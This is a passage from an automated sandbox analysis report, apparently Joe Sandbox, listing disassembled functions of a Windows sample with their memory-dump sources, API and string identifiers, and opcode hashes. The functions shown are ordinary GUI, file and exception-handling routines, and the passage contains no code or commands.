                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$Ctrl
                                                                            • String ID: %TsDockablePaneAdapter-%d$%TsDockablePaneAdapter-%d%x$BarName$Panes
                                                                            • API String ID: 1115312430-3329641806
                                                                            • Opcode ID: b8f725dec0edc425fc2445b1fb1bcc69b2e7ab45589596b726a634dfc755755e
                                                                            • Instruction ID: 4bf6d0f3dbf17712561a81f1ed357ecc2ba1d93b6984012d0177c530977eeaa4
                                                                            • Opcode Fuzzy Hash: b8f725dec0edc425fc2445b1fb1bcc69b2e7ab45589596b726a634dfc755755e
                                                                            • Instruction Fuzzy Hash: 68616876710A4081EB1AEB67E8517EC23A1B74DFE4F489126DF296B7A6DF38C841C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400A2580 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Parent$CtrlEventNotify
                                                                            • String ID:
                                                                            • API String ID: 1661099750-0
                                                                            • Opcode ID: a857b6eadb130bcaaaffaf6670c48dbd7f4342e1ac77855a999cfb0adea4d5e5
                                                                            • Instruction ID: 11c587d979f819862aa14713adf658ae397684f3a62e734c92a90e81c922affd
                                                                            • Opcode Fuzzy Hash: a857b6eadb130bcaaaffaf6670c48dbd7f4342e1ac77855a999cfb0adea4d5e5
                                                                            • Instruction Fuzzy Hash: 4F61DC36704A9086EA16DF27E844BDA7760F79CBD4F090126EF4907BB5DFB8C9918B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400DA540 Relevance: 10.7, APIs: 7, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteHashSelect$CompatibleImplImpl::Section
                                                                            • String ID:
                                                                            • API String ID: 1775874395-0
                                                                            • Opcode ID: 51f9e9d826dca7b0014347c0b7d94b2dc800fb54e888fc19f24d8f4cbada8c02
                                                                            • Instruction ID: 7e16959ee8c83da223a3c9f6c7831cfb05562bc3d8ec48cdb5760227ea76ca61
                                                                            • Opcode Fuzzy Hash: 51f9e9d826dca7b0014347c0b7d94b2dc800fb54e888fc19f24d8f4cbada8c02
                                                                            • Instruction Fuzzy Hash: 33616836B04A408AEB15DFB6D4547ED33B2B789B98F044116DF1A677A9CF78C446C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401607D0 Relevance: 10.7, APIs: 7, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Copy$ClientCursorDesktopEqualParentScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 2235599899-0
                                                                            • Opcode ID: 192e31ff38b3db823627327d48c684ca060e3b4657926fd2cf1ba5ad67ff78f7
                                                                            • Instruction ID: dbca2dd95c2468c8f83ee38a7e5e8ecad4fcbbb016721990cf64161fa17f8cb3
                                                                            • Opcode Fuzzy Hash: 192e31ff38b3db823627327d48c684ca060e3b4657926fd2cf1ba5ad67ff78f7
                                                                            • Instruction Fuzzy Hash: 8E517C32B10A518AFB06DB769C447EE23A1B74CF98F084625DF4967BA9EF74C545C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F47E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                            • String ID: pPE
                                                                            • API String ID: 3659116390-398285065
                                                                            • Opcode ID: bc47bc70fee7e2669ee02cb72f3868cf9f254ec8c5f3e64d7d56d91492d04545
                                                                            • Instruction ID: 8de276b883f6af7f0165b2036e86ca78fbfde1c3f50d4306bf3f9e26c13daf50
                                                                            • Opcode Fuzzy Hash: bc47bc70fee7e2669ee02cb72f3868cf9f254ec8c5f3e64d7d56d91492d04545
                                                                            • Instruction Fuzzy Hash: 0851A072710A948AE712CF76E8647DE3BB1F31CB98F04811ADF8A577A8DA74C556C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007687C Relevance: 10.6, APIs: 7, Instructions: 136windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageRectSend$Client$FocusParentScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1639644240-0
                                                                            • Opcode ID: ae340ce731b1ce987b767feb39e152654ba06708f94af1380e1c896fbf4ac1bf
                                                                            • Instruction ID: 69c9e708f2b2dcaf545ed0a3621ff7cc3a12f4c677ce1d34c31e0a421d7a3dcb
                                                                            • Opcode Fuzzy Hash: ae340ce731b1ce987b767feb39e152654ba06708f94af1380e1c896fbf4ac1bf
                                                                            • Instruction Fuzzy Hash: 12513A32305B4192EE57EB37E5547EA2391AB8DBD4F488021EF4A8B7B5EF78C8518700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007810C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l$Ctrl
                                                                            • String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
                                                                            • API String ID: 1115312430-2169875744
                                                                            • Opcode ID: 3459fbaaff882b436ec557462fc04d908743a778c7acd70f3f49e64d9a2c1d84
                                                                            • Instruction ID: 358c6491ad022ff9ec3b91f705a0847f60e1e80446ff04c2547cd85e78efa1f4
                                                                            • Opcode Fuzzy Hash: 3459fbaaff882b436ec557462fc04d908743a778c7acd70f3f49e64d9a2c1d84
                                                                            • Instruction Fuzzy Hash: 14516B72700A9081EA16DBA7D8417EC27A1B74DFE4F498216EF29277E6CF38C942C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014004C210 Relevance: 10.6, APIs: 7, Instructions: 126timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem$AddressAttributesHandleModuleProc
                                                                            • String ID:
                                                                            • API String ID: 1857739635-0
                                                                            • Opcode ID: 0d3b4897b387e64fdd0c0b14e4f908316fec42befe67bed359aedefbe142d509
                                                                            • Instruction ID: f929bb9150d8b2965758582f1c8dc1743656dbba21a272fe9a7c5575bb070c4c
                                                                            • Opcode Fuzzy Hash: 0d3b4897b387e64fdd0c0b14e4f908316fec42befe67bed359aedefbe142d509
                                                                            • Instruction Fuzzy Hash: C1518972720A4594FB52CFB6D9507ED23B5F708B88F418621EF0A8B6A8EFB0C605C344
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014003807C Relevance: 10.6, APIs: 7, Instructions: 113windowthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$MessageParentProcess$ActiveCurrentEnabledFileLastLongModuleNamePopupSendThread
                                                                            • String ID:
                                                                            • API String ID: 2633877278-0
                                                                            • Opcode ID: b8ace73f127b3bd9ea2b160f444a73e18a58572721acac87967515a9266b2455
                                                                            • Instruction ID: 6894b5680ce31aa1d6c6d0963d5a03252c7fea749bb45b3d5ff49dfbb8374840
                                                                            • Opcode Fuzzy Hash: b8ace73f127b3bd9ea2b160f444a73e18a58572721acac87967515a9266b2455
                                                                            • Instruction Fuzzy Hash: E141D27231078046FA779B23A854BDB6795FB8CBD4F481525EF4A4BBB4DB78C8468700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140006580 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize$CountCriticalErrorLastSectionSpin
                                                                            • String ID: CServerConnection::SynchronizeConnectionState$CServerConnectionInstance::CServerConnectionInstance$CoInitializeEx(0, %d) returned hr=0x%08X.$Failed to get the ServerConnection instance.$SBAM.Common
                                                                            • API String ID: 4201420507-533318284
                                                                            • Opcode ID: 54c201f7a7908acdcbb1a63862d186d0046db276e19cc37342e3744c9e2bb8d8
                                                                            • Instruction ID: ae270c2e501c9afe6da6573ed7d97449aa7837582f8a8f54303e692b166d1d5a
                                                                            • Opcode Fuzzy Hash: 54c201f7a7908acdcbb1a63862d186d0046db276e19cc37342e3744c9e2bb8d8
                                                                            • Instruction Fuzzy Hash: 82416872201B4191EB16DF22E848BD83369F70C794F90462AEBAD437B1DFB8C665C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014019013C Relevance: 10.6, APIs: 7, Instructions: 96timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Redraw$CaptureClientCursorDestroyKillParentReleaseScreenTimer
                                                                            • String ID:
                                                                            • API String ID: 3484170629-0
                                                                            • Opcode ID: 3a6ab0f243b45022b8015a6be6e48ec61b6e3b3ced94390272c222ed9c0a6892
                                                                            • Instruction ID: e692f563726f38fb60b2cb904f4238279f72dc007b25fdc64c8d859428dfdc8b
                                                                            • Opcode Fuzzy Hash: 3a6ab0f243b45022b8015a6be6e48ec61b6e3b3ced94390272c222ed9c0a6892
                                                                            • Instruction Fuzzy Hash: 37418B76314A8086EB669B27E458BEE6360F78DF84F084025DF8E47BA4DF38C155C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C21B6 Relevance: 10.6, APIs: 7, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureMessage$DispatchPeekRectWindow
                                                                            • String ID:
                                                                            • API String ID: 2008901295-0
                                                                            • Opcode ID: 8906d8fea19e3c5a3ad36e52a9caa4ad88032af6cdf9d6b0faf3d297e864bff4
                                                                            • Instruction ID: 18d29931327fa553347f9513df5c505b6fc428335f7c8948b53c86c5bebb168b
                                                                            • Opcode Fuzzy Hash: 8906d8fea19e3c5a3ad36e52a9caa4ad88032af6cdf9d6b0faf3d297e864bff4
                                                                            • Instruction Fuzzy Hash: AC41593660474096FB2ADB67E8447EE67A1FB8DF84F084526EB4A47BA8DF78C541C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C8340 Relevance: 10.6, APIs: 7, Instructions: 78windowthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                            • String ID:
                                                                            • API String ID: 2169720751-0
                                                                            • Opcode ID: a2a042eeb29d311535193718630c8d5237fc66cb64f57ba1bb19033ecfed0977
                                                                            • Instruction ID: 3228030013db09f9e7cdab8c035e9d5e91a9a5c3314b980f06a69aeabec86898
                                                                            • Opcode Fuzzy Hash: a2a042eeb29d311535193718630c8d5237fc66cb64f57ba1bb19033ecfed0977
                                                                            • Instruction Fuzzy Hash: C031613230878192EB6E9B27E5847EE67A1FB89BC5F188021EF4A476B5CF38D454C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014000C060 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                            • API String ID: 432778473-1866435925
                                                                            • Opcode ID: fca7a94e78ccb6b6cde913d61ccb4861fd7035a712d37c0c09ed6cc9e234ffcc
                                                                            • Instruction ID: dbd0038594b032e7255f605829b6a0fa310d458f9d90b69c0ca6d0d71a88b500
                                                                            • Opcode Fuzzy Hash: fca7a94e78ccb6b6cde913d61ccb4861fd7035a712d37c0c09ed6cc9e234ffcc
                                                                            • Instruction Fuzzy Hash: 6511C8B163054692FE16EB22E851BEA6310BB9C788FA04017B74E4B9F6EF74C50AC700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140082670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
